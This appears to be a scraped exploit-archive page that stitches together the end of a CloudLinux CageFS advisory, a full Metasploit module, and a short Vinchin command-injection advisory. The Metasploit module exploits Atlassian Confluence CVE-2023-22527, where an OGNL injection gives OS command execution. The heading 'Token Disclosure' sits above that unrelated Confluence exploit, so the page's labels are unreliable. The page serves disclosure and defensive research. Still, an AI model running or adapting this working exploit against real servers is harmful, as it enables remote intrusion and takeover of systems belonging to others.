* CloudLinux OS Documentation. Virtualized /proc filesystem: <https://docs.cloudlinux.com/shared/cloudlinux_os_kernel/#virtualized-proc-filesystem>  
* CageFS 7.1.2-2 beta: <https://blog.cloudlinux.com/beta-cagefs-lve-wrappers-and-bsock-updated>  
* CageFS 7.1.2-2 production: <https://blog.cloudlinux.com/cagefs-lve-wrappers-and-bsock-have-been-rolled-out-to-100>

## Credits ##

* David Lisa Gnedt ([SBA Research](https://www.sba-research.org/))  
-----BEGIN PGP SIGNATURE-----

iQIzBAEBCAAdFiEEL9Wp/yZWFD9OpIt6+7iGL1j3dbIFAmWynusACgkQ+7iGL1j3  
dbKzLhAAwKYUzx9v+tPeTNNUUrgxibQSZIhtxcvpdfYTFQAm+Rj71F8g+FZIqV0D  
5uMjUtutldd1Mh9YfEQ5hGbOawYqnfL9tebEX1SqdbraSD3r4tQEAMowgBMREpFJ  
DgUyIVTSnFVTQqcai2wpObPRgs397qM8mrykH5rAKdLD1kBfpULq7Duec62E740u  
Ay4YiIiO0OZWf7WElH3KunICE/Sv4TzqZ3DEIlSsQZQv8zM5r44O93FhMiMO6n3R  
pKfK8F4ub2y4e3gkW1uaoGO7ZwAW3aR+F5FAi6R5MJXm0RxIibL9tqCyVVrlXTS6  
BZiFzsE9ATSSMGVGGH6O6rb1KXXXTc5jopEjGbQgWMKmZn+NK4yHzITFydzJi04P  
oaoQmbBWyN4OdfGApvUomyqPp6uUE+i1RfniHq+7vmIR5I7D/KsLQorYonmwD/26  
b5BQ99M7sNGHlWbt1vn9imtDj+nw9JTK2425t6swJOc4QPxdKQtx6hESvRJHiPer  
M3VFmgj9c19mXQb2B+k+GgM4h7lrhvOyWGreWo1sOBtwcLX7i3zqkCOqowI3DedE  
cWV2qjNqTUqM4EMn6Gx5Rf32Kp6e1Jj0GXmMl7TVY5taBSyQ7UXPJkLT6MfyM1v6  
hf5wIsINv1dNRQxpWgXiDvZ+d0AdSNxYfRZFe1wyQIKQbwLYm6w=  
=d1f0  
-----END PGP SIGNATURE-----

CloudLinux CageFS 7.1.1-1 Token Disclosure

This Metasploit module exploits an SSTI injection in Atlassian Confluence servers. A specially crafted HTTP request uses the injection to evaluate an OGNL expression resulting in OS command execution. Versions 8.5.0 through 8.5.3 and 8.0 to 8.4 are known to be vulnerable.

    ### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Exploit::Remote  Rank = ExcellentRanking  prepend Msf::Exploit::Remote::AutoCheck  include Msf::Exploit::Remote::HttpClient  include Msf::Exploit::Remote::HTTP::Atlassian::Confluence::Version  def initialize(info = {})    super(      update_info(        info,        'Name' => 'Atlassian Confluence SSTI Injection',        'Description' => %q{          This module exploits an SSTI injection in Atlassian Confluence servers. A specially crafted HTTP request uses          the injection to evaluate an OGNL expression resulting in OS command execution.          Versions 8.5.0 through 8.5.3 and 8.0 to 8.4 are known to be vulnerable.        },        'Author' => [          'Rahul Maini', # ProjectDiscovery analysis          'Harsh Jaiswal', # ProjectDiscovery analysis          'Spencer McIntyre'        ],        'References' => [          ['CVE', '2023-22527'],          ['URL', 'https://confluence.atlassian.com/security/cve-2023-22527-rce-remote-code-execution-vulnerability-in-confluence-data-center-and-confluence-server-1333990257.html'],          ['URL', 'https://blog.projectdiscovery.io/atlassian-confluence-ssti-remote-code-execution/']        ],        'DisclosureDate' => '2024-01-16', # Atlassian advisory released        'License' => MSF_LICENSE,        'Platform' => ['unix', 'linux', 'win'],        'Arch' => [ARCH_CMD],        'Privileged' => false,        'Targets' => [          [            'Unix Command',            {              'Platform' => ['unix', 'linux'],              'Arch' => ARCH_CMD            }          ],          [            'Windows Command',            {              'Platform' => 'win',              'Arch' => ARCH_CMD,              'Payload' => { 'Space' => 8191, 'DisableNops' => true }            }          ]        ],        'DefaultTarget' => 0,        'DefaultOptions' => {          'RPORT' => 8090        },        'Notes' => {          'Stability' => [CRASH_SAFE],          'Reliability' => [REPEATABLE_SESSION],          'SideEffects' => [IOC_IN_LOGS]        }      )    )    register_options([      OptString.new('TARGETURI', [true, 'Base path', '/'])    ])  end  def get_confluence_platform    # this method gets the platform by exploiting CVE-2023-22527    return @confluence_platform if @confluence_platform    header = "X-#{Rex::Text.rand_text_alphanumeric(10..15)}"    ognl = <<~OGNL.gsub(/^\s+/, '').tr("\n", '')      @org.apache.struts2.ServletActionContext@getResponse().setHeader(        '#{header}',        (@java.lang.System@getProperty('os.name'))      )    OGNL    res = inject_ognl(ognl)    return nil unless res    res.headers[header]  end  def check    confluence_version = get_confluence_version    return CheckCode::Unknown('Failed to determine the Confluence version.') unless confluence_version    vprint_status("Detected Confluence version: #{confluence_version}")    if confluence_version > Rex::Version.new('8.5.3')      return CheckCode::Safe("Version #{confluence_version} is not affected.")    end    confluence_platform = get_confluence_platform    unless confluence_platform      return CheckCode::Safe('Failed to test OGNL injection.')    end    vprint_status("Detected target platform: #{confluence_platform}")    CheckCode::Vulnerable('Successfully tested OGNL injection.')  end  def exploit    confluence_platform = get_confluence_platform    unless confluence_platform      fail_with(Failure::NotVulnerable, 'The target is not vulnerable.')    end    unless confluence_platform.downcase.start_with?('win') == (target['Platform'] == 'win')      fail_with(Failure::NoTarget, "The target platform '#{confluence_platform}' is incompatible with '#{target.name}'")    end    print_status("Executing #{payload_instance.refname} (#{target.name})")    execute_command(payload.encoded)  end  def execute_command(cmd, _opts = {})    param = rand_text_alphanumeric(6..10)    # reference a parameter in the OGNL to work around the 200 character length limit    ognl = <<~OGNL.gsub(/^\s+/, '').tr("\n", '')      (new freemarker.template.utility.Execute()).exec(        {@org.apache.struts2.ServletActionContext@getRequest().getParameter('#{param}')}      )    OGNL    if target['Platform'] == 'win'      vars_post = { param => "cmd.exe /c \"#{cmd}\"" }    else      # the command is executed via Runtime.exec, so sh -c "#{cmd}" will not work with all payloads      # see: https://codewhitesec.blogspot.com/2015/03/sh-or-getting-shell-environment-from.html?m=1      vars_post = { param => "sh -c $@|sh . echo #{cmd}" }    end    inject_ognl(ognl, 'vars_post' => vars_post)  end  def inject_ognl(ognl, opts = {})    opts = opts.clone    param = rand_text_alphanumeric(6..10)    final_opts = {      'method' => 'POST',      'uri' => normalize_uri(target_uri.path, 'template/aui/text-inline.vm'),      'vars_post' => {        # label and param are both limited to a 200 character length by default        'label' => "\\u0027+#request.get(\\u0027.KEY_velocity.struts2.context\\u0027).internalGet(\\u0027ognl\\u0027).findValue(#parameters.#{param},{})+\\u0027",        param => ognl      }.merge(opts.delete('vars_post') || {})    }.merge(opts)    send_request_cgi(final_opts)  endend

Atlassian Confluence SSTI Injection

Vinchin Backup and Recovery versions 7.2 and below suffer from a command injection vulnerability in the setNetworkCardInfo function.

    CVE ID: CVE-2024-22900Title: Command Injection Vulnerability in Vinchin Backup and Recovery Versions 7.2 and EarlierDescription:A critical security vulnerability, identified as CVE-2024-22900, has been discovered in Vinchin Backup and Recovery software, affecting versions 7.2 and earlier. The vulnerability is present in the `setNetworkCardInfo` function, which is intended to update network card information.Details:1. The function collects the `NAME` parameter from the user request and assigns it to a variable `$name`.2. The `NAME` parameter value is then used to construct a file path in the `setNetworkCardInfo` function, leading to potential command injection.3. The vulnerability arises from the use of user-supplied input in system commands without proper validation and sanitization.Impact:This vulnerability allows an attacker to inject arbitrary commands via the `NAME` parameter, potentially leading to unauthorized access or control over the affected system.Current Status:As of the current date, there is no known patch available for this vulnerability. Users of Vinchin Backup and Recovery versions 7.2 and earlier are at risk.Recommendation:It is strongly recommended that users of the affected software versions remain vigilant and monitor Vinchin's updates for a security patch. Upon release of a patch, users should prioritize updating their systems to mitigate this security risk.Signed,Valentin Lobstein

Source

Packet Storm